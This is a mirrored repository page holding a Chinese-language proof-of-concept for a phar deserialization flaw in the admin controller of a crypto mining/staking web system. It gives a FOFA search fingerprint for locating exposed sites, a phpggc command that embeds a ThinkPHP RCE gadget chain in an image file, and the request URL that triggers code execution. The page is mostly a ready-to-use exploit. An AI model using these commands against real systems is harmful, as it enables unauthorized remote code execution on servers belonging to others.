admin/POC
1
0
Fork 0
mirror of https://github.com/eeeeeeeeee-code/POC.git synced 2025-11-06 10:56:07 +00:00
Code Issues Packages Projects Releases Wiki Activity
POC/wpoc/挖矿质押单语言系统/某U挖矿质押单语言系统后台phar反序列漏洞.md

23 lines
630 B
Markdown
Raw Normal View History

first commit
2025-03-04 23:12:57 +08:00
# 某U挖矿质押单语言系统后台phar反序列漏洞
**位于 /admin/controller/Cache.php 控制器的 deldir 方法存在file_exists 函数该函数可以直接导致Phar反序列化漏洞触发**
## fofa
```javascript
"/static/index/css/login/framework7.ios.min.css"
```
## poc
首先我们需要用phpggc生成一个绕过图片检测的phar反序列化脚本用一张正常图片即可
```
./phpggc -pj 123.jpg -o evil.jpg ThinkPHP/RCE2 system whoami
```
```
/admin/cache/deldir?backup_file=phar://图片地址
```
![图片](https://sydgz2-1310358933.cos.ap-guangzhou.myqcloud.com/pic/202408281250731.webp)
Reference in New Issue Copy Permalink